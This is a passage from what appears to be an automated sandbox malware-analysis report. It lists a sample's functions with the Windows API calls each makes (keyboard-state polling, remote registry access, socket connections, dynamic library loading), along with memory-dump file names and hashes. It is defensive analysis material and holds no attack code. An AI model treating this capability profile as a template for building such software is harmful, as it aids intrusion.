                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EB18E4
                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EB1917
                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EB1A3A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EB1AB0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2364364464-0
                                                                                                                        • Opcode ID: 468e93dd62dcff8536be4bfe1663027e5d4871db5bc1c3e44ca823680a92f18c
                                                                                                                        • Instruction ID: 2eaa1c083ed68dd018b3efb5d8b285aee40e7ca7e797981e086c802a8577288e
                                                                                                                        • Opcode Fuzzy Hash: 468e93dd62dcff8536be4bfe1663027e5d4871db5bc1c3e44ca823680a92f18c
                                                                                                                        • Instruction Fuzzy Hash: 3C81A170A40214ABDF109F64C896BAE7BE5FF44364F149099F915BF382DBB5A9408B90
                                                                                                                        Function 00EBDE72 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00EBDFE5
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EBE01D
                                                                                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 00EBE058
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EBE079
                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EBE091
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188977179-0
                                                                                                                        • Opcode ID: e6394335be7754d7544167439108208167bf9ac78030fe8f05439441921c0e6d
                                                                                                                        • Instruction ID: fc32e86e3c9ba60265d5cf8b8045ee6e337d2fc4ff7158623e8212964b4d5072
                                                                                                                        • Opcode Fuzzy Hash: e6394335be7754d7544167439108208167bf9ac78030fe8f05439441921c0e6d
                                                                                                                        • Instruction Fuzzy Hash: BD618A75B0C604AFDB219F18CC90FFB7BBAAB45314F149499F55AAB3A1D731A940CB10
                                                                                                                        Function 00EB0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00EB05DF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EB066E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EB068C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EB06D2
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00EB06EC
                                                                                                                          • Part of subcall function 00E6F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E9AEA5,?,?,00000000,00000008), ref: 00E6F282
                                                                                                                          • Part of subcall function 00E6F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00E9AEA5,?,?,00000000,00000008), ref: 00E6F2A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 327935632-0
                                                                                                                        • Opcode ID: ec39228ad1f697975e8daedf7718c0ffab0bcb294d5a7dcd450b1202c48abeeb
                                                                                                                        • Instruction ID: 69334bd5c0116aea4c81d804be851fb4e953145b5eda753612c13ac5089aea43
                                                                                                                        • Opcode Fuzzy Hash: ec39228ad1f697975e8daedf7718c0ffab0bcb294d5a7dcd450b1202c48abeeb
                                                                                                                        • Instruction Fuzzy Hash: FF514875A002159FCB00EFA8C8909EEB7F5EF48314B1494A6EA55BB361EB30ED49CF51
                                                                                                                        Function 00EB2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00EB3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB2DE0
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EB2E1F
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EB2E66
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00EB2E92
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EB2E9F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3440857362-0
                                                                                                                        • Opcode ID: 80f6fa82dd66a1ea0371765e0cdcb6815a2982a3742f409d343d12a5d76b9e83
                                                                                                                        • Instruction ID: 098cb88749c4ca1383eb0c764fec9709763b421378a10fe74268a8d51905865f
                                                                                                                        • Opcode Fuzzy Hash: 80f6fa82dd66a1ea0371765e0cdcb6815a2982a3742f409d343d12a5d76b9e83
                                                                                                                        • Instruction Fuzzy Hash: 76515D71108204AFC705EF64CC91EABB7E9FF88304F14591EFA95A71A1DB31E909CB52
                                                                                                                        Function 00EBCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ebf607ed62e4106561fc0728e3d88c2fd36a21f76f22de20c9d92a0041fb48c8
                                                                                                                        • Instruction ID: 9bf2295caab65627e60a9c28873066fd68aa0086ca87d5affb7de3d5424356b8
                                                                                                                        • Opcode Fuzzy Hash: ebf607ed62e4106561fc0728e3d88c2fd36a21f76f22de20c9d92a0041fb48c8
                                                                                                                        • Instruction Fuzzy Hash: FB412435908104AFD720DF38CC89FEABBA8EB09324F255666F969F72D1C7709D01DA50
                                                                                                                        Function 00EA1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EA17D4
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EA17FD
                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EA183C
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EA1861
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EA1869
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1389676194-0
                                                                                                                        • Opcode ID: 92283434760a73ecd90f5973f171ccce0cccdb2d823bee0ecb60e41222752f40
                                                                                                                        • Instruction ID: e658b60ef5ce0b0a866fe8b4342684dd37394eb2388b47fc8331fa1608eb6509
                                                                                                                        • Opcode Fuzzy Hash: 92283434760a73ecd90f5973f171ccce0cccdb2d823bee0ecb60e41222752f40
                                                                                                                        • Instruction Fuzzy Hash: 51414635A00215EFCB15EF64C981AADBBF5FF08314B148499E81ABB361DB31ED05CB61
                                                                                                                        Function 00E6B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(000000FF), ref: 00E6B749
                                                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00E6B766
                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00E6B78B
                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00E6B799
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4210589936-0
                                                                                                                        • Opcode ID: dde52922a242585efb4e5e9f9deb40df4840a0d0b47a53a628c2ba0dc50c1c91
                                                                                                                        • Instruction ID: 99a7222462757d8f04fdc0aa1dcef36b9ddd6290bd1a7e950b5bd20178ac81c7
                                                                                                                        • Opcode Fuzzy Hash: dde52922a242585efb4e5e9f9deb40df4840a0d0b47a53a628c2ba0dc50c1c91
                                                                                                                        • Instruction Fuzzy Hash: C7419C71504209FFDF159F64D984EEABBB4FB453A4F10531AF828B2290C731A990DFA1
                                                                                                                        Function 00E8C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E8C156
                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00E8C200
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E8C208
                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00E8C216
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E8C21E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3382505437-0
                                                                                                                        • Opcode ID: 1d0594362a5167cc50d89f2fb46c890466443485e9e40a9c56434b5f4aa7e18a
                                                                                                                        • Instruction ID: cac12b3d72b3641d30b126145ad552f3eab43110a635f1412d26fbf7d5904342
                                                                                                                        • Opcode Fuzzy Hash: 1d0594362a5167cc50d89f2fb46c890466443485e9e40a9c56434b5f4aa7e18a
                                                                                                                        • Instruction Fuzzy Hash: 1331C071501219EFDB04DFA8DD8CA9E3BB5EB05329F204215F929B71D1C7B09904CBA0
                                                                                                                        Function 00E8E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00E8E9CD
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E8E9EA
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E8EA22
                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E8EA48
                                                                                                                        • _wcsstr.LIBCMT ref: 00E8EA52
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3902887630-0
                                                                                                                        • Opcode ID: a4e38bc35a6f8aa2eaf9ffe65f8ab8b09089f50550f36b584d8b7a5ebcb3ab49
                                                                                                                        • Instruction ID: d83204c88ec80ba23b4eb6b103cb49c8ef2a94d07fd3199716cb0899f54179e1
                                                                                                                        • Opcode Fuzzy Hash: a4e38bc35a6f8aa2eaf9ffe65f8ab8b09089f50550f36b584d8b7a5ebcb3ab49
                                                                                                                        • Instruction Fuzzy Hash: C0212C71204200BEEB19AB69EC45E7B7BECDF45754F10D06AF80DEA151EA70DC408390
                                                                                                                        Function 00EBDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EBDCC0
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EBDCE4
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EBDCFC
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00EBDD24
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00EA407D,00000000), ref: 00EBDD42
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2294984445-0
                                                                                                                        • Opcode ID: 94b59929d4df5eef2d75e8b93ecf1b99df1efb7180b419a5f475cfd9bba67a63
                                                                                                                        • Instruction ID: a3dbe74fbf0e28fbe5601de9059e1db808544169175ab45876eabaaf0488db00
                                                                                                                        • Opcode Fuzzy Hash: 94b59929d4df5eef2d75e8b93ecf1b99df1efb7180b419a5f475cfd9bba67a63
                                                                                                                        • Instruction Fuzzy Hash: AC21C471608216AFCB215F799C44BEA7BA8FB45378B115725F976E61E0E3709814CB80
                                                                                                                        Function 00E8CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E8CA86
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E8CAB8
                                                                                                                        • __itow.LIBCMT ref: 00E8CAD0
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E8CAF6
                                                                                                                        • __itow.LIBCMT ref: 00E8CB07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2983881199-0
                                                                                                                        • Opcode ID: 9c01d7beecdc765055032e5592d4208e0f150db524bdb90af0ad493fb1e4e644
                                                                                                                        • Instruction ID: d16fd0c9191eb5d7e7cf1b00045d78900874217a8daf38d4aeac6998c957858b
                                                                                                                        • Opcode Fuzzy Hash: 9c01d7beecdc765055032e5592d4208e0f150db524bdb90af0ad493fb1e4e644
                                                                                                                        • Instruction Fuzzy Hash: 3E21C2726006086BDB21BA759C47EDE7BE9AF4A750F206465FA0EF7191D6708D0983B0
                                                                                                                        Function 00E96D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53B1E: _wcsncpy.LIBCMT ref: 00E53B32
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00E96DBA
                                                                                                                        • GetLastError.KERNEL32 ref: 00E96DC5
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E96DD9
                                                                                                                        • _wcsrchr.LIBCMT ref: 00E96DFB
                                                                                                                          • Part of subcall function 00E96D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00E96E31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3633006590-0
                                                                                                                        • Opcode ID: cc144a8647c6c3c68adae6e3cbf916358b678a9db27f1a31666529cdb7edf418
                                                                                                                        • Instruction ID: 4665b444228ce0140748cf462cbcf9cdae86cb74e032f49a3faad406c1a36e9d
                                                                                                                        • Opcode Fuzzy Hash: cc144a8647c6c3c68adae6e3cbf916358b678a9db27f1a31666529cdb7edf418
                                                                                                                        • Instruction Fuzzy Hash: EC2106756063189ADF217774EC4AAEA33ACCF01354F206557E425F31E2EF20CF889A50
                                                                                                                        Function 00EA9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00EAACF5
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EA9160
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA916F
                                                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00EA918B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3701255441-0
                                                                                                                        • Opcode ID: 5f078cb09ec466e818cd3e16fedef90a563051fb59826aa5a94c3e06f2ab2bb8
                                                                                                                        • Instruction ID: e172760b042a58a7862383dfe67acfe639641619c8f2ab13644771939a5e980c
                                                                                                                        • Opcode Fuzzy Hash: 5f078cb09ec466e818cd3e16fedef90a563051fb59826aa5a94c3e06f2ab2bb8
                                                                                                                        • Instruction Fuzzy Hash: 9E218C312042219FDB00AF68DC89B6E77EDEF49724F05945AF916BB3A2CA70A8058B51
                                                                                                                        Function 00EA89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 00EA89CE
                                                                                                                        • GetForegroundWindow.USER32 ref: 00EA89E5
                                                                                                                        • GetDC.USER32(00000000), ref: 00EA8A21
                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00EA8A2D
                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00EA8A68
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
